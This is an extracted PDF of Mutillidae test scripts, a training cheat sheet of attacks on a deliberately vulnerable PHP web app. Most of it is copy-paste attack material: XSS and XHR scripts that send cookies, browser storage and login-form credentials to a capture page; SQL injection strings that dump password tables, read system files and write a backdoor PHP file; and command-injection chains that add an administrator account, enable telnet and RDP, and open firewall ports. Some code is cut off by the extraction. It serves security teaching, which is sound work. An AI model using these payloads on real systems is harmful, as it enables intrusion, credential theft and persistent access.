Mutillidae Test Scripts

8/12/2019 Mutillidae Test Scripts

1/27

Topics

Installation

XAMPPVMSamurai - Bootable DVDSamurai InstallationCustom Bootable DVD

Mutillidae Uses

1. Teach web developers how to write secure code2. Teach web developers what exploits may be possible3. Teach web developers insecure coding patterns4. Demonstrate to DBAs what exploits may be possible5. Demonstrate to management what exploits may be possible

--------------------Demonstration--------------------

Pen Testing Methodology (CEH version)

ReconScanning (Discover hosts, ports, services, internal network map, Enumerating user names)

Gaining AccessMaintaining AccessCover Tracks

----------------------------------------BEEF Framework----------------------------------------

Put this text into the add-to-my-blog as a blog entry:

Most developers do not understand how dangerous XSS can be

----------------------------------------Grendel Scan----------------------------------------Backtrack 5:

Change directory to /pentest/web/grendel-scan/.Run grendel.sh to pull up GUI.Provide target URL.Provide non-existent output directory.Configure plug-ins.Run scan.

When scan is done, click terminate scan.Report will be generated.

----------------------------------------RatProxy----------------------------------------

To scan generally:Backtrack 5:

Capture Data: /usr/bin/ratproxy -w ~/pentests/scan-results/mutil


2/27

lidae/ratproxy/20110115.log -v ~/pentests/scan-results/mutillidae/ratproxy -d 192.168.56.101 -p 8088 -lextscgj

Generate Report: ratproxy-report.sh ~/pentests/scan-results/mutillidae/ratproxy/20110115.log > mut-rat.html

To find XSS:Backtrack 5:

Capture Data: /usr/bin/ratproxy -w ~/pentests/scan-results/mutillidae/ratproxy/20110115.log -v ~/pentests/scan-results/mutillidae/ratproxy -d 192.168.56.101 -p 8088 -x

Generate Report: ratproxy-report.sh ~/pentests/scan-results/mutillidae/ratproxy/20110115.log > mut-rat.html

----------------------------------------SQLMAP----------------------------------------

*** CONFIRMED! ***python sqlmap.py --url="http://192.168.56.101/mutillidae/index.php?page=view-someones-blog.php" --data="author=6C57C4B5-B341-4539-977B-7ACB9D42985A&view-someones-blog-php-submit-button=View+Blog+Entries" --level=1 --beep --dump

----------------------------------------HTML 5 - Injecting XSS into JSON

----------------------------------------

Page: pen-test-tool-lookup.php

Beginner: Pop up an alert box to show injection worked

Unencoded: "}} );alert(1);//Complete Injection: "}} )%3balert(1)%3b//Prefix: "}} )%3bPayload: alert(1)%3bSuffix: //

Copy and Paste: "}} )%3balert(1)%3b//

Intermediate: Steal cookie with redirection

Unencoded:"}} );document.location="http://localhost/mutillidae/capture-data.php?cookie=" + document.cookie;//

Prefix:"}} )%3bPayload:document.location%3d%22http%3a%2f%2flocalhost%2fmutillid

ae%2fcapture-data.php%3fcookie%3d%22+%2b+document.cookie%3bSuffix://Complete Injection: "}} )%3bdocument.location%3d%22http%3a%2f%2f

localhost%2fmutillidae%2fcapture-data.php%3fcookie%3d%22+%2b+document.cookie%3b//

Copy and Paste:

"}} )%3bdocument.location%3d%22http%3a%2f%2flocalhost%2fmutillidae%2fcapture-data.php%3fcookie%3d%22+%2b+document.cookie%3b//

Professional: Steal cookies with XHR injection----------------------------------------------------------------

----------------Generic XHR using GET and XMLHttpRequest to steal cookies- prefix and suffix as neccesary


3/27

- This is optimized for Firefox which has XMLHttpRequest. Some newer IE will as well.

NOTE: During Reconnassaince, study your target to determine whatkind of browser

they have so the scripts can be tailored and testing for those browsers.

--------------------------------------------------------------------------------

This is a "UDP-style GET". We fire and forget but cannot know ifsucceeded or failed. Perfect for using against savvy users.

Copy and Paste:

var lXMLHTTP; try{ var lAction = "http://localhost/mutillidae/capture-data.php?cookie=" + document.cookie; lXMLHTTP = new XMLHttpRequest(); lXMLHTTP.onreadystatechange = function(){}; lXMLHTTP.open("GET", lAction);lXMLHTTP.send(""); }catch(e){}

--------------------------------------URL Encoded Version--------------------------------------Prefix: "}} )%3bPayload: var+lXMLHTTP%3btry%7b+var+lAction+%3d+%22http%3a%2f%2fl

ocalhost%2fmutillidae%2fcapture-data.php%3fcookie%3d%22+%2b+document.cookie%3blXMLHTTP+%3d+new+XMLHttpRequest()%3b+lXMLHTTP.onreadystatechange+%3d+function()%7b%7d%3blXMLHTTP.open(%22GET%22%2c+lAction)%3blXMLHTTP.send(%22%22)%3b%7dcatch(e)%7b%7d

Suffix: //Complete Injection: "}} )%3bvar+lXMLHTTP%3btry%7b+var+lAction+%3

d+%22http%3a%2f%2flocalhost%2fmutillidae%2fcapture-data.php%3fcookie%3d%22+%2b+document.cookie%3blXMLHTTP+%3d+new+XMLHttpRequest()%3b+lXMLHTTP.onreadystatechange+%3d+function()%7b%7d%3blXMLHTTP.open(%22GET%22%2c+lAction)%3blXMLHTTP.send(%22%22)%3b%7dcatch(e)%7b%7d//

Copy and Paste:

"}} )%3bvar+lXMLHTTP%3btry%7b+var+lAction+%3d+%22http%3a%2f%2flocalhost%2fmutillidae%2fcapture-data.php%3fcookie%3d%22+%2b+document.cookie%3blXMLHTTP+%3d+new+XMLHttpRequest()%3b+lXMLHTTP.onreadystatechange+%3d+function()%7b%7d%3blXMLHTTP.open(%22GET%22%2c+lAction)%3blXMLHTTP.send(%22%22)%3b%7dcatch(e)%7b%7d//

--------------------------------------------------------------------------------HTML 5 - Local and session storage - setting values--------------------------------------------------------------------------------

Setting Test Values for HTML5 Storage

// You can use these statements to set some test values.

localStorage.setItem("key1","value1");localStorage.setItem("key2","value2");sessionStorage.setItem("key1","value1");sessionStorage.setItem("key2","value2");

--------------------------------------------------------------------------------HTML 5 - Local and session storage - Reading values--------------------------------------------------------------------------------

------------------------------------------------------------------------


4/27

--------Reading current HTML5 storage from local browser------------------------------------------------------------------------

--------

try{

var m = "";var l = window.localStorage;var s = window.sessionStorage;

for(i=0;i


5/27

.getItem(lKey) + ";\n";};console.log(m);}catch(e){alert(e.message);}

--------------------------------------------------------------------------------HTML 5 - Local and session storage - Adding values--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

Adding values to HTML5 Storage (Possible Session Fixation)------------------------------------------------------------------------

--------

localStorage.setItem("AccountNumber","123456");sessionStorage.setItem("EnterpriseSelfDestructSequence","A1B2C3"

);sessionStorage.setItem("SessionID","japurhgnalbjdgfaljkfr");sessionStorage.setItem("CurrentlyLoggedInUser","1233456789");

Copy and Paste script to add values - TESTED SUCCESSFULLY

try{localStorage.setItem("AccountNumber","123456");sessionStorage.setItem("EnterpriseSelfDestructSequence","A1B2C3");sessionStorage.setI

tem("SessionID","japurhgnalbjdgfaljkfr");sessionStorage.setItem("CurrentlyLoggedInUser","1233456789");}catch(e){alert(e.message);}

Copy and Paste script to read values (Alert box version)

try{var m = "";var l = window.localStorage;var s = window.sessionStorage;for(i=0;i


6/27

structSequence","A1B2C3");sessionStorage.setItem("SessionID","japurhgnalbjdgfaljkfr");sessionStorage.setItem("CurrentlyLoggedInUser","1233456789");try{var m = "";var l = window.localStorage;var s = window.sessionStorage;for(i=0;i


7/27

.getItem(lKey) + ";\n";};console.log(m);}catch(e){alert(e.message);}try{localStorage.setItem("MessageOfTheDay","This was set by Firebug console!"); sessionStorage.setItem("CartSession","ABCDEFG");}catch(e){alert(e.message);}try{var m = "";var l = window.localStorage;var s = window.sessionStorage;for(i=0;i


8/27


9/27

ge.removeItem("CartSession");}catch(e){console.log(e.message);}try{var m = "";var l = window.localStorage;var s = window.sessionStorage;for(i=0;i


10/27

r s = window.sessionStorage;for(i=0;i


11/27

try{var m = "";var l = window.localStorage;for(i=0;i


12/27

m += "localStorage(" + l.key(i) + "):" +l.getItem(l.key(i)) + "; ";

}

var lAction = "http://localhost/mutillidae/capture-data.php?html5storage=" + m;

lXMLHTTP = new XMLHttpRequest(); lXMLHTTP.onreadystatechange = function(){};

lXMLHTTP.open("GET", lAction);lXMLHTTP.send("");

}catch(e){}

Copy and PasteReflected Cross Site Script - TESTED SUCCESSFULLY

try{ var s = sessionStorage; var l = localStorage; var m= ""; var lXMLHTTP; for(i=0;i


13/27

Recon: Determine current directory

Windows XP: && dirLinux: && pwd

Recon: Chain commands to discover driectory structure

Windows XP: && cd ../../.. && dirLinux: && cd ../../.. && ls -l

Recon: Get a list of offerings provided by the "net.exe" program

Windows XP: && net

Recon: Get a list of services that can be started or stopped

Windows XP: && net startWindows XP: && net stop

Scanning: Get machine network settings, hostname, DNS servers, subnet mask, etc.

Windows XP: && ipconfig /allLinux: && ifconfig

Scanning: Discover hosts on network

Windows XP: && ping -n 1 192.168.56.102Linux: && ping -c 1 192.168.56.102

Scanning: Enumerate Current user

Windows XP: && setLinux: && whoami

Scanning: Enumerate computers, users, groups, AD computers, AD users, AD groups

Windows XP: && net view [/domain]Windows XP: && net user [/domain]Windows XP: && net localgroup [/domain]

Gaining Access: Add user

Windows XP: && net user /addLinux: useradd

Gaining Access: Delete user

Windows XP: && net user /delete

Maintain Access: Get Windows Service Names

Windows: sc query

Maintain Access: kill AV

net stop

Maintain Access: kill firewall


14/27


15/27

Allow firewall access (netsh firewall add portopening protocol=TCP port=23 name=telnet mode=enable scope=custom addresses=)

whatever && netsh firewall add portopening protocol=TCP port=23name=telnet mode=enable scope=custom addresses=

----------------------------One combined injection:----------------------------

whatever && sc config tlntsvr start= demand && sc start tlntsvr&& net user root toor /add && net localgroup TelnetClients /add && net localgroup Administrators root /add && net localgroup TelnetClients root /add && netsh firewall add portopening protocol=TCP port=23 name=telnet mode=enable scope=customaddresses=192.168.56.101

------------------------------------------------------------------------------------------------------------Command Injection: Enable Windows XP SP3 and similar Remote Desktop Terminal Service------------------------------------------------------------------------------------------------------------

Check if service running (sc query termservice)Configure service from "disabled" to "manual"(sc config termservice star

t= demand)Start service (sc start termservice)Enable Terminal Services (reg add "hklm\system\currentcontrolset\control

\terminalserver" /v fdenytsconnections /t reg_dword /d 0 /f)Enable Terminal Services (reg add "hklm\system\currentcontrolset\control

\terminalserver" /v TSEnabled /t reg_dword /d 1 /f)Check if service listening (netstat -na | find "3389")Add user (net user /add)Add user to group (net localgroup "Remote Desktop Users" /add)Configure firewall to allow RDP (netsh firewall set service type=remoted

esktop mode=enable scope=custom addresses=)

-------------------------SQL Injection-------------------------

Recon: Returns a string that indicates the MySQL server version

Page: user-info.phpField: UsernameValue: ' union select null,VERSION() AS username,null,null --

' union select null,null,null,version() --

Recon: Returns a string that indicates the current database name

Page: user-info.phpField: UsernameValue: ' union select null,DATABASE() AS username,null,null --

Recon: Returns a string that indicates the current database username

Page: user-info.phpField: Username


16/27

Value: ' union select null,USER() AS username,null,null --

Recon: Extract table names from database

Page: user-info.phpField: Username' union select null,table_schema AS username,table_name AS password,null

from INFORMATION_SCHEMA.TABLES--

Recon: Extract table columns from database using a single field

Page: user-info.phpField: UsernameValue: ' union select null,concat_ws('.', table_schema, table_name, colu

mn_name) AS username,null,null from INFORMATION_SCHEMA.COLUMNS--

Recon: Extract views from database (Doesnt work in MySQL 5.1.8)

Page: user-info.phpField: UsernameValue: ' union select null,concat_ws('.', table_schema, table_name, view

_definition) AS username,null,null from INFORMATION_SCHEMA.VIEWS--

Recon: Extract triggers from database

Page: user-info.phpField: UsernameValue: ' union select null,concat_ws('.', trigger_schema, trigger_name)

AS username,null,null from INFORMATION_SCHEMA.TRIGGERS--

Recon: Extract routines/procs from database

Page: user-info.phpField: UsernameValue: ' union select null,concat_ws('.', routine_schema, routine_name,

'(', routine_type, ')') AS username,null,null from INFORMATION_SCHEMA.ROUTINES--

Recon: Extract metadata from database

Page: user-info.phpField: UsernameValue: ' union select null,concat_ws('.', table_schema, table_name, colu

mn_name) AS username,null,null from INFORMATION_SCHEMA.COLUMNS union select null,concat_ws('.', routine_schema, routine_name, routine_type, routine_body) AS username,null,null from INFORMATION_SCHEMA.ROUTINES union select null,concat_ws('.', table_schema, table_name, view_definition) AS username,null,null from INFORMATION_SCHEMA.VIEWS union select null,concat_ws('.', trigger_schema, trigger_name)AS username,null,null from INFORMATION_SCHEMA.TRIGGERS--

Recon/Scanning: Get specifications on database software

Page: user-info.phpField: UsernameValue: ' union select null, database(), current_user(), version() --

Gaining Access: Extract passwords from user table

Value: ' union select null, owasp10.accounts.username AS username, owasp10.accounts.password AS password, null from owasp10.accounts --


17/27

Maintaining Access:

Covering Tracks:

Page: login.php

Gaining Access: Using SQL Injection

' or 1=1 --

Inserting new user using insert injection to bypass any protections. This example inserts a cross site script.

Page: Register.phpField: Username

backdoor','password','alert(\'Mallicious user input\')') --

Note: Kind of pointless but still fun

Using advanced techniques: Select Concat Char

Page: user-info.php

This allows injection to select arbitrary text. This can be useful to bypass filters and WAFs.

' UNION ALL SELECT null,CONCAT(CHAR(112, 97, 115, 115, 119, 111, 114, 100)),null,null --

Using advanced techniques: Select Using IFNULL to search for columns

Page: user-info.php' UNION ALL SELECT null,IFNULL(CAST(username AS CHAR),CHAR(32)),IFNULL(C

AST(password AS CHAR),CHAR(32)),null FROM accounts --

Using advanced techniques: Open files on target operating system

Page: user-info.phpField: usernameValues:

' union select null, LOAD_FILE('../README') AS username, null, null--

' union select null, LOAD_FILE('..\\..\\..\\..\\WINDOWS\\system32\\drivers\\etc\\hosts') AS username, null, null--

' union select null, LOAD_FILE('..\\..\\..\\..\\WINDOWS\\inf\\cpu.inf') AS username, null, null--

' union select null, LOAD_FILE('mysql_error.log'), null, null--

' union select null, LOAD_FILE('..\\..\\..\\htdocs\\mutillidae\\index.php'), null, null--

Using advanced techniques: Writing files to operating systemPage: user-info.phpField: usernameValues:

' union select null,null,null,'Please enter system command


18/27

td>Command' INTODUMPFILE '..\\..\\htdocs\\mutillidae\\backdoor.php' --

Please enter system command

Command

Please enter system commandCommand

Using advanced techniques: Insert Injection

Technique: SQL Insert InjectionPage: add-to-your-blog.phpField: blogValue: BARK','2003-12-31 01:02:03') --

--------------------------------------------------Blind SQL Injection--------------------------------------------------

Recon: Blind SQL Injection/Brute Forcing values

' union Select null, case current_user() when 'root@localhost' THEN sleep(5) ELSE sleep(0) END, null, null --

' union select null, null, null, IF(((SELECT count(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_name = 'user') > 0), sleep(5), sleep(0)) --

' union Select null, case current_user() when 'root@localhost' THEN sleep(5) ELSE sleep(0) END, null, null --


19/27

' union Select null, sleep(5) --

Page: login.phpTechnique: Blind SQL Injection - TimingField: usernameValue (Using Proxy): ' union Select null, case SUBSTRING(current_user(),1,1) when 'r' THEN sleep(5) ELSE sleep(0) END, null, null --Value (Using Direct Request): username=%27%20union%20Select%20null%2C%20case%20SUBSTRING%28current_user%28%29%2C1%2C1%29%20when%20%27r%27%20THEN%20sleep%285%29%20ELSE%20sleep%280%29%20END%2C%20null%2C%20null%20--%20&password=&login-php-submit-button=1

Page: login.phpTechnique: Blind SQL Injection - True and False ValuesField: usernameTrue Value (Using Proxy): ' or 1=1 --False Value (Using Proxy): ' and 1=0 --Examine responses to see if they are different

------------------------------------------------------------------------------------------Broken Authentication and Session Management - Escalating privileges--------------------------------------------------------------------------------

----------

Gaining Access: Using insecure client-side authentication tokens

Page: Any pageTool: Web Developer Toolbar

Note what cookies the site has by defaultCreate a test accountLogin using test accountCheck what cookies the site has after authenticationLogoutVerify auth cookies are gone or get rid of them

Create a new cookie based on the original auth cookie, but with different value

Gaining Access: Using insecure client-side authentication tokens

Page: Any pageTool: Cookies Manager+ version 1.5.1 (verified with Firefox 4.0.1)

Note what cookies the site has by defaultCreate a test accountLogin using test accountCheck what cookies the site has after authenticationDifferential Analysis: Change the value of the original auth cookieWork backwards until admin account is found

------------------------------------------------------------------------------------------Broken Authentication and Session Management - Bypass Authorization Control------------------------------------------------------------------------------------------

Gaining Access: Using SQL injection

Page: login.php


20/27

Field: UsernameValue: ' or 1=1 --

Gaining Access: Using SQL injection

Page: login.phpField: UsernameValue: ' --

------------------------------------------------------------Insecure Direct Object Reference - Accessing system files------------------------------------------------------------

Step 1: Recon: Obtain list of files

Possible Technique: Use command injectionPage: dns-lookup.phpValue (Windows): && dir /wValue (Linux): && pwd && ls -l

Possible Techniques: Use robots.txtPossible Techniques: Use directory browsingPossible Techniques: Use directory brute-forcing

Step 2: Gaining Access: Retrive system files

Page: source-viewer.phpTechnique: Use proxy to change value, Use parent directory to bypass jailsTool: Tamper Data, Paros, WebScarab, BurpField: phpfileValue: , ../../../boot.ini, ..\..\..\WINDOW\System32\drivers\etc\hosts, ../../../etc/passwd

-----------------------------Cross Site Scripting-----------------------------

Page: add-to-your-blog.phpField: blog contentsValue: alert("Cookie stolen and sent to mallicious server: " + document.cookie + ". The developer should have encoded all output, validated all input, )

HTTP Header: Browser User Agent StringTool: User Agent SwitcherValue: Sorry, please login again
Username
Password

Defense: EncodingDefense When certain tokens allowed: Mapping

Page: add-to-your-blog.phpField: blog contentsTool: Burp-SuiteValue:


21/27

function capture(theForm){

var lXMLHTTP;try{

var lData = "username=" + theForm.username.value+ "&password=" + theForm.password.value;

var lHost = "localhost";var lProtocol = "http";var lAction = lProtocol + "://" + lHost + "/muti

llidae/capture-data.php";var lMethod = "post";try{

lXMLHTTP = new ActiveXObject("Msxml2.XMLHTTP");

}catch (e){try{

lXMLHTTP = new ActiveXObject("Microsoft.XMLHTTP");

}catch(e) {try{

lXMLHTTP = new XMLHttpRequest();

}catch (e) {alert(e.message);//THIS

LINE IS TESTING AND DEMONSTRATION ONLY. DO NOT INCLUDE IN PEN TEST.};//end try};//end try

};//end trylXMLHTTP.onreadystatechange = function(){

if(lXMLHTTP.readyState == 4){theForm.parentNode.style.display

="none";}// end if

};

lXMLHTTP.open(lMethod, lAction, true);

lXMLHTTP.setRequestHeader("Host", lHost);lXMLHTTP.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

lXMLHTTP.send(lData);}catch(e){

alert(e.message);//THIS LINE IS TESTING AND DEMONSTRATION ONLY. DO NOT INCLUDE IN PEN TEST.

};};//end function

Were

sorry. This session has expired.

Please login again.UsernamePassword


22/27

Defense: Encoding

Page: add-to-your-blogField: blog contentsValue:

var lXMLHTTP;try{

var lData = "data=" + encodeURIComponent(document.cookie);var lHost = "localhost";var lProtocol = "http";var lFilePath = "/mutillidae/capture-data.php";var lAction = lProtocol + "://" + lHost + lFilePath;var lMethod = "POST";

try {lXMLHTTP = new ActiveXObject("Msxml2.XMLHTTP");

}catch (e) {try {

lXMLHTTP = new ActiveXObject("Microsoft.XMLHTTP"

); }catch (e) {try {

lXMLHTTP = new XMLHttpRequest();}catch (e) {

//alert(e.message);//THIS LINE IS TESTING AND DEMONSTRATION ONLY. DO NOT INCLUDE IN PEN TEST.

}}

}//end try

lXMLHTTP.onreadystatechange = function(){}lXMLHTTP.open(lMethod, lAction, true);

lXMLHTTP.setRequestHeader("Host", lHost);lXMLHTTP.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

lXMLHTTP.send(lData);

}catch(e){}

-----------------------------Cross Site Request Forgery-----------------------------

Page: add-to-your-blog, view-someones-blogTool: HTTPFox (to view forged request)

Force someone to add a blog without consent:


23/27


24/27

-------------------------Security Misconfiguration-------------------------

Improper Error Handling:

Page: login.phpField: usernameValue: Result: Error gives SQL exception

---------------------------------Insecure Direct Object References---------------------------------

Page: source-viewer.phpField: phpfileValue (Windows XP): c:\boot.ini, C:\WINDOWS\system32\drivers\etc\hostsTool: netcat, tamper data, paros, webscarab, burp

Use netcat or hackbar to send in post data:

phpfile=c:\boot.ini&source-file-viewer-php-submit-button="View File"phpfile=C:\WINDOWS\system32\drivers\etc\hosts&source-file-viewer-php-sub

mit-button="View File"

Alternative: Use proxy to change value of phpfile to system file

---------------------------------Insecure Cryptographic Storage---------------------------------

Extract passwords from system:

Page: user-info.phpTechnique: Direct SQL injectionField: username

Value: ' or 1=1 --

Page: user-info.phpTechnique: Indirect SQL injectionField: usernameValue: ' union select null, owasp10.accounts.username AS username, owasp10.accounts.password AS password, null from owasp10.accounts --

Page: login.phpTechnique: Blind SQL InjectionField: usernameValue (Using Proxy): ' union Select null, case SUBSTRING(current_user(),1,1) when 'r' THEN sleep(5) ELSE sleep(0) END, null, null --

Value (Using Direct Request): username=%27%20union%20Select%20null%2C%20case%20SUBSTRING%28current_user%28%29%2C1%2C1%29%20when%20%27r%27%20THEN%20sleep%285%29%20ELSE%20sleep%280%29%20END%2C%20null%2C%20null%20--%20&password=&login-php-submit-button=1

---------------------------------Failure to Restrict URL Access---------------------------------


25/27

Page: robots.txtTechnique: Security Misconfiguration, Design Flaw

Recon: List FilesTechnique: Shoulder surfing

Recon: List FilesTechnique: Steal Bookmarks

Recon: List FilesTechnique: Dump client cache

Recon: List FilesPage: dns-lookup.phpTechnique: Command InjectionField: hostname

Scanning: View Source CodePage: dns-lookup.phpTechnique: Command InjectionField: hostnameValue: && type config.inc (then see source because PHP code doesnt show in browser)

Gaining Access: View restricted pagePage: Any (i.e. - http://localhost/mutillidae/config.inc, http://localhost/mutillidae/passwords/accounts.txt)Technique: Type in URL

------------------------------------------Insufficient Transport Layer Protection------------------------------------------

Gaining Access: Intercept clear text credentialsPage: login.phpTool: Use any proxy (Paros, Tamper Data) or sniffer (Wireshark, TCPDump, Snort,etc.)

Fields: Username and Password

------------------------------------------Unvalidated redirects and forwards------------------------------------------

Page: credits.phpTechnique: PhishingTool: Any proxy, netcat, hackbarField: forwardurlValue: any URI

Page: credits.php

Technique: Horizontal Application Attack, Restricted URL Access, Authroization BypassTool: Hackbar, anything that can change the URL query parametersField: forwardurlValue: http://localhost/xampp

--------------------------------------------Information Asset Protection - Cache Control--------------------------------------------


26/27

Recon: Grab leaked company informationPage: index.php, allTechnique: View local cacheTool: Firefox about:cache, Internet Explorer Tools-->Options-->General Tab-->Browser History Settings-->View FilesDefenses: cache control headers

--------------------------------------------Information Asset Protection - Framing--------------------------------------------

Gaining Access: Cross Frame Scripting/Click-jackingPage: index.php, allTecnique: Frame page, use overlayTool (to view defenses): HTTPFoxDefense: x-frame-options, frame busters

----------------------------------------------Information Asset Protection - Leaked Comments----------------------------------------------

Page: index.phpTechnique: View SourceTool: View Source, Sniffer (Wireshark), HTTPFox

Defense: Use framework comment tags to trap comments on the app server

----------------------------------------------Log Injection----------------------------------------------

Page: show-log.phpTechnique: Figure out what fields are logged, which of those the client controls, and inject those fields with SQL injection, HTML injection, XSS, XSRF, etc.Defense: Logs should be output encoded

--------------------------------------------------------------------------------Generic XHR to steal cookies (prefix and suffix as necessary)

--------------------------------------------------------------------------------

var lXMLHTTP;try{

var lData = ;var lHost = "";var lAction = "http://" + lHost + ""

;var lMethod = "";try {

lXMLHTTP = new ActiveXObject("Msxml2.XMLHTTP");}catch (e) {

try {lXMLHTTP = new ActiveXObject("Microsoft.XMLHTTP"

);}catch (e) {

try {lXMLHTTP = new XMLHttpRequest();

}catch (e) {alert(e.message);//THIS LINE IS TESTING

AND DEMONSTRATION ONLY. DO NOT INCLUDE IN PEN TEST.}


27/27

}}//end trylXMLHTTP.onreadystatechange = function(){

if(lXMLHTTP.readyState == 4){alert("Capture Complete");//THIS LINE IS TESTING

AND DEMONSTRATION ONLY. DO NOT INCLUDE IN PEN TEST.}// end if

}

lXMLHTTP.open(lMethod, lAction, true);

///////////////////////////////UNCOMMENT FOR GET REQUESTS///////////////////////////////NOTE: This is a GET so your URL-action has to contain your dat

a. We clear lData only to avoid error.//lData="";/////////////////////////////

///////////////////////////////UNCOMMENT FOR POST REQUESTS///////////////////////////////lXMLHTTP.setRequestHeader("Host", lHost);

//lXMLHTTP.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");/////////////////////////////

lXMLHTTP.send(lData);

}catch(e){alert(e.message);//THIS LINE IS TESTING AND DEMONSTRATION ONLY.

DO NOT INCLUDE IN PEN TEST.}

Documents

Mutillidae Test Scripts